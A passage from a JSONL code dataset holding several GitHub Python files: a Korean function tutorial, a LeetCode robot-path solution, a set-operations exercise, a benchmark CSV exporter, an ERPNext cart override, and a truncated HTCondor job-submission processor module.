만들기위해 특정 실행문들을 모아둔 것.\n\n# Define Function\n# argument : 인자\ndef hello(x):\n \n y = x + 3\n \n # return : 함수 종료\n return y\n\n print(y)\n \n# Call Function\n# parameter : 매개변수\nprint(hello(3))","repo_name":"nature1339/portfolio2","sub_path":"function01.py","file_name":"function01.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32810344794","text":"#\n# https://leetcode.com/problems/robot-bounded-in-circle/\n#\n\ndef isRobotBounded(instructions):\n # directions\n # north - 0, east - 1, south - 2, west - 3\n #\n # note that we are setting directions based on how we rotate\n #\n # initially, it is facing north, hence 0\n # if rotated right, we are facing east, hence 0 + 1 = 1\n # similarly, again, right, we are south-facing, hence, 1 + 1 = 2\n # same for west, hence 3\n #\n # thus, if rotating right - we should do, (direction + 1) % 4\n # and rotating left - we should do, (direction - 1) % 4\n #\n # we do % 4 since we only have 4 directions from 0 - 3\n #\n\n #\n # SOLUTION:\n #\n # OPTIMAL: the idea here is that(math involved) - if after one instruction\n # set, robot is at origin (or) not-north facing, it is bound\n #\n # (OR)\n #\n # another solution is that, if robot gets back to origin after 4 iterations\n # of instruction set, then, it is bound\n #\n north = 0\n east = 1\n south = 2\n west = 3\n\n x = y = 0\n direction = north\n\n # instructions can be one of 'G', 'L', 'R'\n for instruction in instructions:\n if instruction == 'G':\n if direction == north:\n y += 1\n elif direction == east:\n x += 1\n elif direction == south:\n y -= 1\n elif direction == west:\n x -= 1\n elif instruction == 'L':\n direction = (direction - 1) % 4\n elif instruction == 'R':\n direction = (direction + 1) % 4\n\n return (x == 0 and y == 0) or direction != north\n\nprint(isRobotBounded('GGLLGG'))\nprint(isRobotBounded('GG'))\nprint(isRobotBounded('GL'))\n","repo_name":"Suraj-Rajesh/code","sub_path":"Algos/leetcode/top/is_robot_bounded.py","file_name":"is_robot_bounded.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70952280072","text":"def operatii_fisiere(*nume_fisiere):\n reuniune=set()\n intersectie = None\n for nume_fisier in nume_fisiere:\n f=open(nume_fisier)\n ls=set(int(x) for x in f.read().split())\n reuniune= reuniune | ls #reuniune.update(ls)\n if intersectie == None:\n intersectie=ls\n else:\n intersectie.intersection_update(ls)\n f.close()\n return reuniune,intersectie\nr,i=operatii_fisiere(\"fisier1.in\",\"fisier2.in\")\nprint(r,i)\n","repo_name":"tudor0prea/FMI-UniBuc","sub_path":"FACULTATE/ANUL 1/Semestrul I/PA/Curs/Reuniune_numere.py","file_name":"Reuniune_numere.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"nl","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"36077371318","text":"import pandas as pd\nimport sys\nimport os\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport argparse\nimport bz2\nimport sys\n\nfrom benchmark.datasets import DATASETS\nfrom benchmark.plotting.utils import compute_metrics_all_runs\nfrom benchmark.results import load_all_results, get_unique_algorithms\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--output',\n help='Path to the output csv file',\n required=True)\n parser.add_argument(\n '--recompute',\n action='store_true',\n help='Path to the output csv file')\n parser.add_argument(\n\n '--private-query',\n help='Use the private queries and ground truth',\n action='store_true')\n parser.add_argument(\n '--sensors',\n action='store_true',\n help='Export sensors data if available')\n parser.add_argument(\n '--search-times',\n action='store_true',\n help='Export search times data if available')\n parser.add_argument(\n '--detect-caching',\n type=float,\n default=None,\n metavar=\"THRESHOLD\",\n help='Try to detect query response caching by analyzing search times. Supply a threshold betwee 0 and 1, such as 0.3.')\n args = parser.parse_args()\n\n if args.detect_caching!=None and not args.search_times:\n print(\"Error: --detect_caching requires the --search_times flag\")\n sys.exit(1)\n\n datasets = DATASETS.keys()\n dfs = []\n\n is_first = True\n for dataset_name in datasets:\n print(\"Looking at dataset\", dataset_name)\n dataset = DATASETS[dataset_name]()\n results = load_all_results(dataset_name)\n results = compute_metrics_all_runs(dataset, results, args.recompute, \\\n args.sensors, args.search_times, args.private_query)\n cleaned = []\n for result in results:\n if 'k-nn' in result:\n result['recall/ap'] = result['k-nn']\n del result['k-nn']\n if 'ap' in result:\n result['recall/ap'] = result['ap']\n del result['ap']\n if args.sensors:\n if 'wspq' not in result:\n print('Warning: wspq sensor data not available.')\n if args.search_times:\n search_times = result['search_times']\n if 'search_times' in result:\n # create a space separated list suitable as column for a csv\n result['search_times'] = \\\n \" \".join( [str(el) for el in search_times ] )\n\n if args.detect_caching != None: \n print(\"%s: Checking for response caching for these search times->\" % dataset_name, search_times) \n percent_improvement = (search_times[0]-search_times[-1])/search_times[0]\n caching = percent_improvement > args.detect_caching\n result['caching'] = \"%d %f %f\" % ( 1 if caching else 0, args.detect_caching, percent_improvement )\n if caching:\n print(\"Possible caching discovered: %.3f > %.3f\" % ( percent_improvement, args.detect_caching) )\n else:\n print(\"No response caching detected.\")\n\n else:\n print(\"Warning: 'search_times' not available.\")\n cleaned.append(result)\n dfs.append(pd.DataFrame(cleaned))\n if len(dfs) > 0:\n data = pd.concat(dfs)\n data.to_csv(args.output, index=False)\n\n","repo_name":"baidu/puck","sub_path":"ann-benchmarks/data_export.py","file_name":"data_export.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"27"} +{"seq_id":"30730490680","text":"import frappe\nfrom cart_extra.shopping_cart.cart import _get_cart_quotation\nfrom erpnext.shopping_cart.doctype.shopping_cart_settings.shopping_cart_settings \\\n import get_shopping_cart_settings, show_quantity_in_website\nfrom erpnext.utilities.product import get_price, get_qty_in_stock\nfrom erpnext.shopping_cart.product_info import\\\n get_product_info_for_website as get_product_info_for_website_original\n\n\n@frappe.whitelist(allow_guest=True)\ndef get_product_info_for_website(item_code):\n \"\"\"get product price / stock info for website\"\"\"\n if frappe.session.user != 'Guest':\n return get_product_info_for_website_original(item_code)\n\n cart_quotation = _get_cart_quotation()\n cart_settings = get_shopping_cart_settings()\n\n price = get_price(\n item_code,\n cart_quotation.selling_price_list,\n cart_settings.default_customer_group,\n cart_settings.company\n )\n\n stock_status = get_qty_in_stock(item_code, \"website_warehouse\")\n\n product_info = {\n \"price\": price,\n \"stock_qty\": stock_status.stock_qty,\n \"in_stock\": stock_status.in_stock if stock_status.is_stock_item else 1,\n \"qty\": 0,\n \"uom\": frappe.db.get_value(\"Item\", item_code, \"stock_uom\"),\n \"show_stock_qty\": show_quantity_in_website(),\n \"sales_uom\": frappe.db.get_value(\"Item\", item_code, \"sales_uom\")\n }\n\n if product_info[\"price\"]:\n if frappe.session.user != \"Guest\":\n item = cart_quotation.get({\"item_code\": item_code})\n if item:\n product_info[\"qty\"] = item[0].qty\n\n return {\n \"product_info\": product_info,\n \"cart_settings\": cart_settings\n }\n","repo_name":"tundebabzy/cart-extra","sub_path":"cart_extra/shopping_cart/product_info.py","file_name":"product_info.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31123596432","text":"from collections import ChainMap\nfrom contextlib import ExitStack\nfrom dataclasses import dataclass, field, replace\nfrom enum import IntEnum\nimport errno\nimport itertools\nimport logging\nimport os\nfrom random import Random\nfrom shutil import which\nfrom tempfile import gettempdir, mkstemp, TMP_MAX\nfrom time import sleep\nfrom types import TracebackType\nfrom typing import Any, AnyStr, Callable, cast, Dict, Iterable, Iterator, List, Mapping, Optional, SupportsInt, Tuple, Type, Union\n\nfrom classad import ClassAd\nfrom htcondor import JobAction, Schedd, Submit\n\nfrom .config import config\nfrom .io import PathType, PrimitivePathType, resolve_abs_path\nfrom .params import ParamSet, resolve, Resolvable\nfrom .process import FileAccessor, Process, Result as ProcessResult\nfrom .processor import Processor\nfrom .subprocessor import FileDescriptor, prepare_input_file, prepare_output_file\nfrom .utils import CallbackOnException, HandlersCollector, HandlersList\n\n\n\"\"\"\n\nSources:\n\n* https://htcondor.readthedocs.io/en/latest/apis/python-bindings/users/Submitting-and-Managing-Jobs.html\n* https://htcondor.readthedocs.io/en/latest/apis/python-bindings/advanced/Advanced-Schedd-Interactions.html\n\nTransfer of Files:\n\n Jobs are executed in a job-specific working directory referred to as the\n scratch directory on the execute machine. The initial directory refers to\n the directory on the submit machine where ``condor_q`` was called. This\n can be overwritten with the ``initialdir`` command.\n\n Input files specified via ``transfer_input_files`` are transferred from\n the submit machine to the scratch directory before starting the job.\n Relative paths are evaluated from the initial directory. The basename of\n the file on the submit machine is used as the name in the scratch\n directory. There must be no duplicate basenames. Links are followed.\n\n If output files are specified via ``transfer_output_files``, these files\n are transferred back to the initial directory. Relative paths are\n evaluated from the scratch directory, absolute paths from the execute\n machine's root. If no output files are specified, all modified files in\n the scratch directory (no subdirectories) are transferred back. The\n basename of the file on the execute machine is used as the name in the\n initial directory. The ``transfer_output_remaps`` may specify other paths\n on the submit machine where files should be copied to.\n\n The files specified as the values of the ``executable``, ``input``,\n ``output`` and ``error`` commands are implicit input and output files. The\n ``transfer_input``, ... commands determine whether these files are\n transferred to the submit machine. They default to ``True``. ``input``,\n ``output`` and ``error`` can be streamed instead of being copied through\n the ``stream_input``, ... commands.\n\n The ``should_transfer_files`` command (values: ``YES``, ``NO``,\n ``IF_NEEDED``) controls what clauses are added to the ``requirements``\n attribute of the job's ClassAd. ``NO`` adds a check for\n ``FileSystemDomain`` being equal to the value of the submit machine.\n ``YES`` adds a check for the targeted execute machine to have file\n transfer mechanisms (``HasFileTransfer``). ``IF_NEEDED`` is the default\n and adds both checks combined with a logical or (`||`).\n\n ``when_to_transfer_output`` (values: ``ON_EXIT``, ``ON_EXIT_OR_EVICT``) is\n set to ``ON_EXIT`` (the default), as there is no clear desired behaviour\n on eviction.\n\n Sources:\n\n * https://htcondor.readthedocs.io/en/latest/users-manual/file-transfer.html\n * https://htcondor.readthedocs.io/en/latest/users-manual/submitting-a-job.html\n * https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n\n\nFile Mapping Strategy:\n\n stdin, stdout, stderr: Temporary files (/tmp) are used if no paths are\n specified. Otherwise the file path is passed directly to the ``input``,\n ``output`` and ``error`` commands. The ``stream_input``, ... commands are\n never set.\n\n Input files: The challenge is to achieve unique naming. A temporary file\n (/tmp) is created if no path is specified. These temporary files already\n have unique names due to the temporary file mechanism. If a path is\n specified, a symbolic link using the temporary files mechanism (/tmp) is\n created to the file. The resulting path is specified in the\n ``transfer_input_files`` command. The presented path for both is the\n basename of the temporary file.\n\n Output files: Output files require unique naming analogously to input\n files. A temporary file (/tmp) is created if no path is specified (unique\n name). If a path is specified, a temporary file (/tmp) is still created to\n have a unique basename. The resulting basenames are specified in\n ``transfer_output_files``. ``transfer_output_remaps`` is used to specify\n the absolute path on the submit machine for each output file.\n\nJob Status Codes:\n\n ::\n\n 0 Unexpanded U\n 1 Idle I\n 2 Running R\n 3 Removed X\n 4 Completed C\n 5 Held H\n 6 Submission_err E\n\n http://pages.cs.wisc.edu/~adesmet/status.html\n\n https://htcondor-wiki.cs.wisc.edu/index.cgi/wiki?p=MagicNumbers\n\n\nFor Testing:\n\n https://github.com/andypohl/htcondor-docker\n\n ::\n\n cd repo-root\n mkdir htcondor_tests\n docker run -d -v `pwd`:/host -h htcondor --name htcondor andypohl/htcondor\n docker exec -it htcondor bash\n (in docker) yum install python3\n docker exec -it -u 1000:1000 htcondor bash\n (in docker) cd /host/htcondor_tests\n (in docker) python3 -m venv venv\n (in docker) . venv/bin/activate\n (in docker) pip install -U pip wheel\n (in docker) pip install -e .[htcondor]\n docker exec -it -u 1000:1000 htcondor bash\n (in docker) cd /host/htcondor_tests\n (in docker) . venv/bin/activate\n (in docker) bjec run test_simple\n\nTodo:\n * Batching of jobs. Set via HTCondor constructor or configuration option.\n Batches are a concurrency mechanism. When submitting via clusters,\n only an entire cluster can be submitted at a time. A batch is a set of\n jobs with a fixed size. Is time-in-queue important for scheduling?\n Perhaps for rank expressions which change with age? In order to\n overlap batches, each cluster could have a size of 1/k * batch_size.\n This way there would be k cluster in the queue simultaneously. A new\n cluster is submitted as soon as there are less than batch_size -\n cluster_size jobs enqueued. The term batch size is not ideal for this\n scenario. Is there any disadvantage in submitting each job in its own\n cluster? That would be the smoothest concurrency control possible.\n Batch, limit jobs per cluster, limit clusters in the queue\n * Requeueing of failed processes. Could be done via the max_retries and\n retry_until commands. retry_until supports class ad expressions but\n would this would require translating Python functions into class ad\n expressions.\n * Recognising temporary errors when querying (or otherwise interacting)\n with HTCondor services. Retry (with backoff?) in that case.\n * Supporting Jobs without a Process?\n * Support for working directory via a wrapper script when running on a\n shared file system?\n When should_transfer_files = NO and transfer_output = False\n (and ...error, ...input, ...executable), initialdir is used as the\n working directory.\n * Setting temp_dir on a job basis?\n\n\"\"\"\n\n_Intable = Union[str, bytes, SupportsInt]\n\ndef _opt_int(value: Optional[_Intable]) -> Optional[int]:\n if value is None:\n return value\n else:\n return int(value)\n\ndef _contains_any(s: str, what: Iterable[str]) -> bool:\n for c in what:\n if c in s:\n return True\n\n return False\n\ndef _quote(token: str) -> str:\n quote_wrap = _contains_any(token, ' \\t\\'')\n\n quoted = token.replace('\\'', '\\'\\'').replace('\"', '\"\"')\n\n if quote_wrap:\n return '\\'' + quoted + '\\''\n elif len(token) == 0:\n return '\\'' + token + '\\''\n else:\n return quoted\n\ndef _args_to_str(args: Iterable[str]) -> str:\n \"\"\"\n\n Serialises a list of arguments to a str suitable for the ``arguments``\n command.\n\n From the ``condor_submit`` reference referring to the ``arguments``\n command as part of a definition file:\n\n 1. The entire string representing the command line arguments is surrounded\n by double quote marks. This permits the white space characters of\n spaces and tabs to potentially be embedded within a single argument.\n Putting the double quote mark within the arguments is accomplished by\n escaping it with another double quote mark.\n 2. The white space characters of spaces or tabs delimit arguments.\n 3. To embed white space characters of spaces or tabs within a single\n argument, surround the entire argument with single quote marks.\n 4. To insert a literal single quote mark, escape it within an argument\n already delimited by single quote marks by adding another single quote\n mark.\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n \"\"\"\n\n return '\"' + ' '.join(_quote(arg) for arg in args) + '\"'\n\ndef _environment_to_str(environment: Mapping[str, str]) -> str:\n \"\"\"\n\n Serialises key value pairs of an environment to a str suitable for the\n ``environment`` command.\n\n From the ``condor_submit`` reference referring to ``environment`` command\n as part of a definition file:\n\n 1. Put double quote marks around the entire argument string. This\n distinguishes the new syntax from the old. The old syntax does not\n have double quote marks around it. Any literal double quote marks\n within the string must be escaped by repeating the double quote mark.\n 2. Each environment entry has the form =\n 3. Use white space (space or tab characters) to separate environment\n entries.\n 4. To put any white space in an environment entry, surround the space and\n as much of the surrounding entry as desired with single quote marks.\n 5. To insert a literal single quote mark, repeat the single quote mark\n anywhere inside of a section surrounded by single quote marks.\n\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n \"\"\"\n\n return '\"' + ' '.join(f'{key}={_quote(value)}' for key, value in environment.items()) + '\"'\n\ndef _file_remaps_to_str(remaps: Mapping[str, str]) -> str:\n \"\"\"\n\n Serialises remaps to a str suitable for the ``transfer_output_remaps``\n command.\n\n From the ``condor_submit`` reference referring to\n ``transfer_output_remaps`` command as part of a definition file: ::\n\n transfer_output_remaps = < \" name = newname ; name2 = newname2 ... \">\n\n ``name`` describes an output file name produced by your job, and\n ``newname`` describes the file name it should be downloaded to. Multiple\n remaps can be specified by separating each with a semicolon. If you wish\n to remap file names that contain equals signs or semicolons, these special\n characters may be escaped with a backslash. You cannot specify directories\n to be remapped.\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n\n Testing with HTCondor v8.9.4 has shown that equal signs only have to be\n escaped in ``name`` and semicolons only have to be escaped in\n ``newname``.\n \"\"\"\n\n def esc_k(s: str) -> str:\n return s.replace('=', '\\\\=')\n def esc_v(s: str) -> str:\n return s.replace(';', '\\\\;')\n\n return '\"' + ';'.join(f'{esc_k(key)}={esc_v(value)}' for key, value in remaps.items()) + '\"'\n\ndef _files_to_str(files: Iterable[str]) -> str:\n \"\"\"\n\n Serialises a list of files to a str suitable for the\n ``transfer_input_files`` and ``transfer_output_files`` commands.\n\n There are no documented rules for escaping commas in the file names.\n Testing with HTCondor v8.9.4 did not reveal any obvious escaping scheme\n (tried: backslash escape, single quotation marks).\n\n https://htcondor.readthedocs.io/en/stable/man-pages/condor_submit.html\n \"\"\"\n\n return ','.join(files)\n\ndef _path_to_str(path: PrimitivePathType) -> str:\n if isinstance(path, str):\n return path\n else:\n return os.fsdecode(path)\n\ndef _get_poll_sleep_times(first: int=10, max: int=600) -> Iterator[int]:\n cur = first\n while cur < max:\n yield cur\n cur *= 2\n for val in itertools.repeat(max):\n yield val\n\n\nclass _ProcessFailedError(Exception):\n pass\n\n\nclass _Status(IntEnum):\n UNEXPANDED = 0\n IDLE = 1\n RUNNING = 2\n REMOVED = 3\n COMPLETED = 4\n HELD = 5\n SUBMISSION_ERR = 6\n\n @classmethod\n def from_value(cls, val: Union[int, _Intable]) -> '_Status':\n int_val = val if isinstance(val, int) else int(val)\n\n if int_val == _Status.UNEXPANDED:\n return _Status.UNEXPANDED\n elif int_val == _Status.IDLE:\n return _Status.IDLE\n elif int_val == _Status.RUNNING:\n return _Status.RUNNING\n elif int_val == _Status.REMOVED:\n return _Status.REMOVED\n elif int_val == _Status.COMPLETED:\n return _Status.COMPLETED\n elif int_val == _Status.HELD:\n return _Status.HELD\n elif int_val == _Status.SUBMISSION_ERR:\n return _Status.SUBMISSION_ERR\n else:\n raise ValueError(val)\n\n\n@dataclass\nclass _JobState:\n \"\"\"\n\n https://htcondor.readthedocs.io/en/latest/classad-attributes/job-classad-attributes.html\n \"\"\"\n\n cluster_id: int\n proc_id: int\n job_status: _Status\n exit_code: Optional[int]\n exit_by_signal: bool\n exit_signal: Optional[int]\n\n @classmethod\n def from_class_ad(cls, class_ad: ClassAd) -> '_JobState':\n return cls(\n cluster_id = int(cast(_Intable, class_ad['ClusterId'])),\n proc_id = int(cast(_Intable, class_ad['ProcId'])),\n job_status = _Status.from_value(cast(_Intable, class_ad['JobStatus'])),\n exit_code = _opt_int(cast('Optional[_Intable]', class_ad.get('ExitCode'))),\n exit_by_signal = class_ad.get('ExitBySignal', 'false') == 'true',\n exit_signal = _opt_int(cast('Optional[_Intable]', class_ad.get('ExitSignal'))),\n )\n\n @staticmethod\n def projection() -> List[str]:\n return [\n 'ClusterId', 'ProcId', 'JobStatus', 'ExitCode', 'ExitBySignal', 'ExitSignal',\n ]\n\n\n@dataclass\nclass _StatusCounts(object):\n unexpanded: int = 0\n idle: int = 0\n running: int = 0\n removed: int = 0\n completed: int = 0\n held: int = 0\n submission_err: int = 0\n\n @property\n def total(self) -> int:\n return (\n self.unexpanded\n + self.idle\n + self.running\n + self.removed\n + self.completed\n + self.held\n + self.submission_err\n )\n\n def __getitem__(self, key: int) -> int:\n if key == _Status.UNEXPANDED:\n return self.unexpanded\n elif key == _Status.IDLE:\n return self.idle\n elif key == _Status.RUNNING:\n return self.running\n elif key == _Status.REMOVED:\n return self.removed\n elif key == _Status.COMPLETED:\n return self.completed\n elif key == _Status.HELD:\n return self.held\n elif key == _Status.SUBMISSION_ERR:\n return self.submission_err\n else:\n raise KeyError(key)\n\n def __setitem__(self, key: int, val: int) -> None:\n if key == _Status.UNEXPANDED:\n self.unexpanded = val\n elif key == _Status.IDLE:\n self.idle = val\n elif key == _Status.RUNNING:\n self.running = val\n elif key == _Status.REMOVED:\n self.removed = val\n elif key == _Status.COMPLETED:\n self.completed = val\n elif key == _Status.HELD:\n self.held = val\n elif key == _Status.SUBMISSION_ERR:\n self.submission_err = val\n else:\n raise KeyError(key)\n\n def add_job(self, job: Union[ClassAd, _JobState]) -> None:\n if isinstance(job, _JobState):\n self[job.job_status] += 1\n else:\n self[int(cast(int, job['JobStatus']))] += 1\n\n def add_jobs(self, jobs: Iterable[Union[ClassAd, _JobState]]) -> None:\n for job in jobs:\n self.add_job(job)\n\n\nclass Job(object):\n class Fluid(object):\n def __init__(self) -> None:\n self._stack: List[Callable[[Job], None]] = []\n\n def process(self, process: Process) -> 'Job.Fluid':\n \"\"\"Sets the process to be executed.\n\n The command has to be set, a job cannot execute without setting\n this. If unset, :meth:`Job.validate()` will raise.\n \"\"\"\n\n def f(j: Job) -> None:\n j._process = process\n\n return self + f\n\n def commands(self, commands: Mapping[str, Resolvable[str]]) -> 'Job.Fluid':\n \"\"\"Sets additional commands to include in the job definition.\n\n Calling this method again will overwrite all additional commands\n previously passed via this method.\n\n Paths of input and output files are available during evaluation as\n ``P('__file_NAME')``.\n \"\"\"\n\n def f(j: Job) -> None:\n j._commands = commands\n\n return self + f\n\n def transfer_files(self, transfer: bool=True) -> 'Job.Fluid':\n \"\"\"Configures whether the file transfer mechanism should be used.\n \"\"\"\n\n def f(j: Job) -> None:\n j._transfer_files = transfer\n\n return self + f\n\n def capture_log(\n self,\n capture: bool = True,\n path: Optional[Resolvable[PathType]] = None,\n must_not_exist: bool = False,\n create_parents: bool = False,\n mode: int = 0o666,\n cleanup_after_finish: bool = False,\n ) -> 'Job.Fluid':\n \"\"\"Configure whether and how the job log is captured.\n\n Args:\n capture: If ``True`` the job log is captured and made available\n in ``Result`` instances. Subsequent calls may disable\n capturing by setting ``False``.\n path: If not ``None`` the job log is made available at this\n path. Otherwise the implementer may use a temporary file\n or store content in-memory.\n must_not_exist: If ``True`` the execution is considered failed\n if the file already exists before the process is started.\n This is evaluated before the process is started. Only\n considered if ``path`` is not ``None``, as otherwise the\n implementer manages the file.\n create_parents: If ``True`` all parent directories of the file\n are created if non-existent. Directories are created with\n the default mode, disregarding the ``mode`` parameter.\n Only considered if ``path`` is not ``None``.\n mode: Mode bits of the file, see ``os.open()`` for details.\n Only considered when ``path`` is not ``None``.\n cleanup_after_finish: If ``True`` the stdout file is deleted\n when the `finish` lifetime stage is reached. Only\n considered when ``path`` is not ``None``.\n\n Raises:\n ValueError: If the combination of arguments is not valid.\n \"\"\"\n\n if not capture and path is not None:\n raise ValueError('A file path was passed but log is not supposed to be captured')\n\n def f(j: Job) -> None:\n j._log = Job._Log(\n capture = capture,\n path = path,\n must_not_exist = must_not_exist,\n create_parents = create_parents,\n mode = mode,\n cleanup_after_finish = cleanup_after_finish,\n )\n\n return self + f\n\n def __add__(self, other: Callable[['Job'], None]) -> 'Job.Fluid':\n return Job.Fluid._with_stack(self._stack + [other])\n\n def build(self) -> 'Job':\n j = Job()\n for f in self._stack:\n f(j)\n\n j.validate()\n\n return j\n\n @classmethod\n def _with_stack(cls, stack: List[Callable[['Job'], None]]) -> 'Job.Fluid':\n fluid: 'Job.Fluid' = Job.Fluid()\n fluid._stack = stack\n return fluid\n\n\n @dataclass()\n class _Log(object):\n capture: bool = False\n path: Optional[Resolvable[PathType]] = None\n must_not_exist: bool = False\n create_parents: bool = False\n mode: int = 0o666\n cleanup_after_finish: bool = False\n\n\n class WithParams(object):\n def __init__(self, job: 'Job', params: ParamSet) -> None:\n self._job: Job = job\n self._params: ParamSet = params\n\n @property\n def process(self) -> Process.WithParams:\n return self._job.process.with_params(self._params)\n\n @property\n def commands(self) -> Dict[str, str]:\n return {\n key: resolve(value, self._params) for key, value in self._job.commands.items()\n }\n\n @property\n def transfer_files(self) -> bool:\n return resolve(self._job.transfer_files, self._params)\n\n @property\n def log(self) -> Process.Stdout:\n log = self._job.log\n return Process.Stdout(\n capture = log.capture,\n path = None if log.path is None else resolve_abs_path(log.path, self._params),\n must_not_exist = log.must_not_exist,\n create_parents = log.create_parents,\n mode = log.mode,\n cleanup_after_finish = log.cleanup_after_finish,\n )\n\n\n def __init__(self) -> None:\n self._process: Process = Process()\n self._commands: Mapping[str, Resolvable[str]] = {}\n self._transfer_files: Resolvable[bool] = True\n self._log: Job._Log = Job._Log()\n\n def validate(self) -> None:\n self._process.validate()\n\n @property\n def process(self) -> Process:\n return self._process\n\n @property\n def commands(self) -> Mapping[str, Resolvable[str]]:\n return self._commands\n\n @property\n def transfer_files(self) -> Resolvable[bool]:\n return self._transfer_files\n\n @property\n def log(self) -> 'Job._Log':\n return self._log\n\n def with_params(self, params: ParamSet) -> 'Job.WithParams':\n return Job.WithParams(self, params)\n\n\nclass Result(ProcessResult):\n def __init__(\n self,\n exit_code: int,\n stdin: Optional[FileAccessor] = None,\n stdout: Optional[FileAccessor] = None,\n stderr: Optional[FileAccessor] = None,\n input_files: Optional[Dict[str, FileAccessor]] = None,\n output_files: Optional[Dict[str, FileAccessor]] = None,\n log: Optional[FileAccessor] = None,\n ) -> None:\n super(Result, self).__init__(\n exit_code = exit_code,\n stdin = stdin,\n stdout = stdout,\n stderr = stderr,\n input_files = input_files,\n output_files = output_files,\n )\n self._log: Optional[FileAccessor] = log\n\n @property\n def log(self) -> FileAccessor:\n if self._log is None:\n raise Exception(f'Log was not captured.')\n return self._log\n\n\nclass HTCondor(Processor[Result]):\n \"\"\"HTCondor performs Process executions through HTCondor's schedd.\n\n Args:\n schedd: :obj:`Schedd` instance to use for submitting jobs and querying their state.\n temp_dir: Directory in which temporary files and links are created while processing. If\n unset, the configuration option of the same name is used. The system default as\n determined by :func:`gettempdir` (e.g. ``/tmp``) is used if the configuration option is\n not set.\n\n Configuration Options:\n\n * ``temp_dir``: Directory in which temporary files and links are created while processing.\n\n Todo:\n * Additional arguments (config, constructor):\n Default commands for jobs?\n \"\"\"\n\n def __init__(\n self,\n schedd: Optional[Schedd] = None,\n temp_dir: Optional[str] = None,\n ) -> None:\n super(HTCondor, self).__init__()\n self._schedd: Schedd = schedd if schedd is not None else Schedd()\n self._temp_dir: str = self._temp_dir_value(temp_dir)\n\n self._cleanup_handlers: HandlersList = HandlersList()\n\n def _temp_dir_value(self, temp_dir: Optional[str]) -> str:\n if temp_dir is not None:\n return temp_dir\n if 'temp_dir' in config[HTCondor]:\n return cast(str, config[HTCondor]['temp_dir'])\n return gettempdir()\n\n def __exit__(self, *args: Any) -> Optional[bool]:\n self._cleanup_handlers()\n self._cleanup_handlers.clear()\n\n return None\n\n def process(\n self, runnable: Any, params_it: Iterable[ParamSet],\n ) -> Iterator[Tuple[ParamSet, Result]]:\n job: Job\n if isinstance(runnable, Process):\n job = Job.Fluid().process(runnable).build()\n elif isinstance(runnable, Job):\n job = runnable\n else:\n raise Exception(f'{self.__class__.__name__} only supports Job and Process runnables')\n\n return self._run_job(job, params_it)\n\n def _run_job(self, job: Job, params_it: Iterable[ParamSet]) -> Iterator[Tuple[ParamSet, Result]]:\n # TODO: introduce public API of Process to get working_directory\n if job.process._working_directory is not None:\n raise Exception('HTCondor does not support setting the working_directory on Process')\n\n with ExitStack() as stack:\n cluster_generator = _JobClusterGenerator(self, job, params_it)\n stack.enter_context(cluster_generator)\n\n submit = Submit()\n\n with self._schedd.transaction() as txn:\n submit_result = submit.queue_with_itemdata(txn, itemdata=iter(cluster_generator))\n\n stack.callback(\n self._schedd.act, JobAction.Remove, f'ClusterId == {submit_result.cluster()}',\n )\n\n job_states: Dict[int, _JobState] = {}\n\n for sleep_time in _get_poll_sleep_times():\n sleep(sleep_time)\n\n query_result = self._schedd.xquery(\n requirements = f'ClusterId == {submit_result.cluster()}',\n projection = _JobState.projection(),\n )\n\n job_states.clear()\n for job_state_ad in query_result:\n job_state = _JobState.from_class_ad(job_state_ad)\n job_states[job_state.proc_id] = job_state\n\n counts = _StatusCounts()\n counts.add_jobs(job_states.values())\n\n print(counts)\n\n if counts.completed == counts.total:\n break\n\n results: List[Tuple[ParamSet, Result]] = []\n for proc_id, process in enumerate(cluster_generator.processes):\n job_state = job_states[proc_id]\n if job_state.exit_by_signal:\n raise _ProcessFailedError(\n f'Process exited due to receiving signal {job_state.exit_signal}',\n )\n if job_state.exit_code is None:\n raise Exception('Exit code received from HTCondor is None')\n\n result = process.result(job_state.exit_code)\n self._check_for_failure(job, result, process.params)\n results.append((process.params, result))\n\n self._cleanup_handlers += cluster_generator.cleanup_handlers\n\n return iter(results)\n\n def _check_for_failure(self, job: Job, result: Result, params: ParamSet) -> None:\n failure_mode = job.with_params(params).process.failure_mode\n\n if failure_mode.interpret_exit_code is not None:\n if failure_mode.interpret_exit_code(result.exit_code):\n raise _ProcessFailedError(f'Exit code {result.exit_code} interpreted as failure')\n if failure_mode.interpret_stderr is not None:\n if failure_mode.interpret_stderr(result.stderr):\n raise _ProcessFailedError(f'Stderr interpreted as failure')\n if failure_mode.interpret_stdout is not None:\n if failure_mode.interpret_stdout(result.stdout):\n raise _ProcessFailedError(f'Stdout interpreted as failure')\n\n\nclass _JobClusterGenerator(object):\n @dataclass\n class _ProcessInfo(object):\n params: ParamSet\n stdin: Optional[FileDescriptor] = None\n stdout: Optional[FileDescriptor] = None\n stderr: Optional[FileDescriptor] = None\n log: Optional[FileDescriptor] = None\n input_files: List[FileDescriptor] = field(default_factory=list)\n output_files: List[FileDescriptor] = field(default_factory=list)\n\n def result(self, exit_code: int) -> Result:\n return Result(\n exit_code,\n stdin = self.stdin.accessor() if self.stdin is not None else None,\n stdout = self.stdout.accessor() if self.stdout is not None else None,\n stderr = self.stderr.accessor() if self.stderr is not None else None,\n log = self.log.accessor() if self.log is not None else None,\n input_files = {\n file.name: file.accessor() for file in self.input_files\n },\n output_files = {\n file.name: file.accessor() for file in self.output_files\n },\n )\n\n def __init__(self, htcondor: HTCondor, job: Job, params_it: Iterable[ParamSet]) -> None:\n self._htcondor: HTCondor = htcondor\n self._job: Job = job\n self._params_it: Iterable[ParamSet] = 